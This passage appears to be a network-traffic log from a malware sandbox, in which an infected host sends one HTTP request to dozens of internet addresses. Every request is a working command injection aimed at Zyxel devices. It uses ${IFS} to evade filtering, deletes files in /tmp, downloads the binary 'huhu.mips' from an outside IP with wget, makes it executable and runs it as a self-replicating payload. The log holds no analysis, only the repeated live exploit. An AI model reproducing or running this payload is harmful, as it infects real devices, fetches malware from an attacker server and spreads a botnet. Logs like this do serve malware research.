                                                      Feb 2, 2024 06:35:45.465336084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2461192.168.2.145411058.69.174.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465404034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2462192.168.2.1451806170.151.92.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465425968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2463192.168.2.1433890202.245.108.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465435982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2464192.168.2.1440138197.148.207.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465478897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2465192.168.2.1452588219.238.66.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465511084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2466192.168.2.145375086.196.228.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465568066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2467192.168.2.144926449.45.102.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465569019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2468192.168.2.145448479.8.37.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465610981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2469192.168.2.1433490113.226.167.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465652943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2470192.168.2.143723454.210.69.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465712070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2471192.168.2.1455402221.89.84.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465734959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2472192.168.2.1445208153.16.216.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465790987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2473192.168.2.1457242144.142.154.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465816021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2474192.168.2.1436344112.38.9.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465857983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2475192.168.2.143661667.37.125.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465882063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2476192.168.2.1443700186.238.236.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465924025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2477192.168.2.143436091.213.253.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465960026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2478192.168.2.143557483.176.60.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.465985060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2479192.168.2.1437342136.82.128.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466018915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2480192.168.2.1460538170.101.100.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466048956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2481192.168.2.1459840217.67.92.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466109991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2482192.168.2.143405472.242.148.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466140985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2483192.168.2.1454982119.222.189.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466188908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2484192.168.2.145703887.179.73.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466233015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2485192.168.2.1440122110.191.183.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466245890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2486192.168.2.1438092144.95.156.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466295958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2487192.168.2.1435956153.19.1.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466325998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2488192.168.2.144842832.138.85.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466356993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2489192.168.2.1439682207.207.79.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466402054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2490192.168.2.1446906205.14.27.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466448069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2491192.168.2.1449792220.222.5.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466486931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2492192.168.2.14484688.206.231.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466526031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2493192.168.2.145246898.45.127.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466557980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2494192.168.2.14512201.105.182.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466614008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2495192.168.2.1448960129.4.62.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466645002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2496192.168.2.1439846170.9.82.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466679096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2497192.168.2.1448170222.87.251.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466717958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2498192.168.2.144512088.79.118.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466775894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2499192.168.2.143991424.27.142.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466821909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2500192.168.2.144758619.130.108.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466852903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2501192.168.2.1456472180.149.162.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466897964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2502192.168.2.144384814.148.73.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466928959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2503192.168.2.1450736151.88.3.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.466984034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2504192.168.2.1447526158.37.152.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467019081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2505192.168.2.1437984180.160.244.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467039108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2506192.168.2.1438210193.43.215.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467078924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2507192.168.2.1445396190.173.210.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467114925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2508192.168.2.145246853.172.152.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467132092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2509192.168.2.1433998142.70.108.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467175961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2510192.168.2.1450224197.255.138.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467233896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2511192.168.2.144468632.138.73.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467261076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2512192.168.2.1450600152.95.170.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467292070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2513192.168.2.145260239.171.12.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467336893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2514192.168.2.14594365.58.185.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467363119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2515192.168.2.1454762189.141.53.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467422962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2516192.168.2.1455366221.4.213.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467449903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2517192.168.2.1458962180.78.51.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467485905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2518192.168.2.146056631.177.190.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467566967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2519192.168.2.1456674163.241.221.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467648029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2520192.168.2.1440460130.117.243.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467648029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2521192.168.2.1443676114.199.120.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467664003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2522192.168.2.1443142108.207.24.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467689037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2523192.168.2.1440212209.91.235.219443
                                                      TimestampBytes transferredDirectionData
